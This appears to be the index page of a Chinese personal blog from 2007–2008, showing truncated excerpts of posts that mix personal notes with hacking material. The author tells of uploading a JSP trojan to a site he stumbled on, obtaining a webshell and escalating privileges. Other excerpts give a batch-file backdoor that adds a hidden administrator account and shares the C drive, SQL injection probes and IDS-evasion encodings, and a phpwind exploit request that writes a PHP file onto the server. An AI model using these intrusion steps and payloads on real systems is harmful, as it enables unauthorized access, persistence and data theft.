内容读取中…

本舍讯:本月4号下午，杨凌天暖气晴，百花争艳。孤傲天星同学坐车回家看望双亲。走时留下了两条脆弱的生命。 直至6号下午，却在南校某个不为人知的宿舍发生了一起惨绝人寰的凶杀案，凶手用锋利的牙齿将两名受害者杀死，受 害者是两条非常漂亮的金鱼。凶手竟然是一只年仅6岁的未成年乌龟。此案的真相正在进一步的审理调查中，据相关部 门获悉，这只乌龟的监护人巧克力猪先生会受到相应的法律制裁。本宿舍成员对这次惨案的发生表示非常遗憾，对受害 者表示深深的哀悼。并希望广大论坛领导给与重视。    &nbs

• 2008年10月23日 星期四 21:41
• 类别：我的文章 评论(4) | 浏览(495)

这是一个jsp站

我刚才在网上无意间发现一个上传地址。。然后上传一个jsp木马。提示没有登陆。。

然后注册一个号。。在上传。。。OK    抓包找到上传之后马的地址。。。得到webshell

下面来说一下我的提权过程。。。

jsp是system权限。。输入whoami确定一下。。。确实是admin

可是这里却不能加用户。。可以执得简单的命令。net user    netstat net start等

上传了cmd   net

• 2008年10月23日 星期四 21:39
• 类别：我的文章 评论(0) | 浏览(1)

我爱的人不爱我了。。。。。

• 2008年03月30日 星期日 21:40
• 类别：我的文章 评论(0) | 浏览(30)

[转载]《SQL Injection规避入侵检测技术总结》 信息来源：天马行空技术小组
《SQL Injection规避入侵检测技术总结》

当我们对一个运行IDS系统的服务器进行SQL注射时，我们往往会遇到很大的麻烦，因为我们的注射语句被过滤了，如何规避这种检测手段就成了一门新的技术，本文就对此规避技术提出十一条思路和方法，与大家商戳。
一、 运用编码技术绕过，如URLEncode编码，ASCII编码绕过。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116

• 2007年05月12日 星期六 14:37
• 类别：我的文章 评论(1) | 浏览(238)

[转载]用批处理写的后门 永不被杀 作者：xyt　　　

代码思路是影子鹰DESERT朋友的，原代码比较麻烦，我做了改进，这个后门优点就是小而且不会被杀，放到SYSTEM32目录下就可以了 ，代码如下：
  @echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @net

• 2007年05月12日 星期六 14:31
• 类别：我的文章 评论(5) | 浏览(256)

SQL注射语句 1.判断有无注入点
' ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select co

• 2007年05月11日 星期五 23:23
• 类别：学习资料 评论(0) | 浏览(261)

信息来源：许文强(许文强 许大虾 牛淫啊！真强。) ————只要给我一个注射点，无论什么权限，我都给你一个webshell甚至系统权限 声明：本文仅用于教学目的，如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大，原文已经经过大量删减及修改，即使这样本文的危害性仍然很 大，所以请大家不要对国内的站点做任何具有破坏性的操作。
考虑再三，偶还是决定发出来。此招手段歹毒，利用范围广泛，可以说是只要是 有sql注射漏洞的网站，只要运用此法99%可以拿到webshell甚至系统权限（

• 2007年04月30日 星期一 16:00
• 类别：学习资料 评论(0) | 浏览(438)

大家知道，通过Ping和Tracert程序就能判断目标主机类型 ，Ping最主要的用处就是检测目标主机是否能连通。Tracert利 用ICMP数据包和IP数据包头部中的TTL值，防止数据包不断在IP 互联网上永不终止地循环。 　　许多入侵者首先会Ping一下你的机子，如看到TTL值为 128就认为你的系统为Windows NT/2000;如果TTL值为32则认为目标主机操作系统为Windows 95/98;如果TTL值为255/64就认为是UNIX/Linux操作系统。既 然入侵者相信TTL值所反映出来的结果，那么我们只要修改TTL 值，入侵者就无法入侵电脑了。 　　操

• 2007年04月22日 星期日 23:37
• 类别：学习资料 评论(1) | 浏览(470)

本期特别采访：小榕 他，流光、溯雪、乱刀等黑客/安全作品的开发者，他的名字可以说载入了中国黑客/安全发展史中辉煌的一页。他的软件相当普及，一次，通过非正常手段进入一台机器，赫然发现机器主人的桌面上摆着“流光”……。对很多黑客爱好者来说，流光就象Winamp、Winzip等常用工具一样，已经成为电脑不可或缺的一部分。

在他的“小榕软件实验室” ，在“关于小榕”的栏目里，他这样写到：无论在现实或是网络中，我都是孤独的……

• 2007年04月22日 星期日 23:20
• 类别：未分类 评论(18) | 浏览(1177)

猫猫传给我一个phpwind漏洞利用程序，可以直接在目录中写入一个木马。怎么说呢，这个漏洞是pinkeyes发现的，本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的，我还在冒虚汗中，同时pinkeyes 的睿智深深的打动了我，原来我才明白什么才是真正的技术含量。且听我慢慢道来：
在程序运行时，我抓了一个包：
GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=<?fputs(fopen
(chr(46).chr(47).chr(

• 2007年04月19日 星期四 19:11
• 类别：未分类 评论(0) | 浏览(419)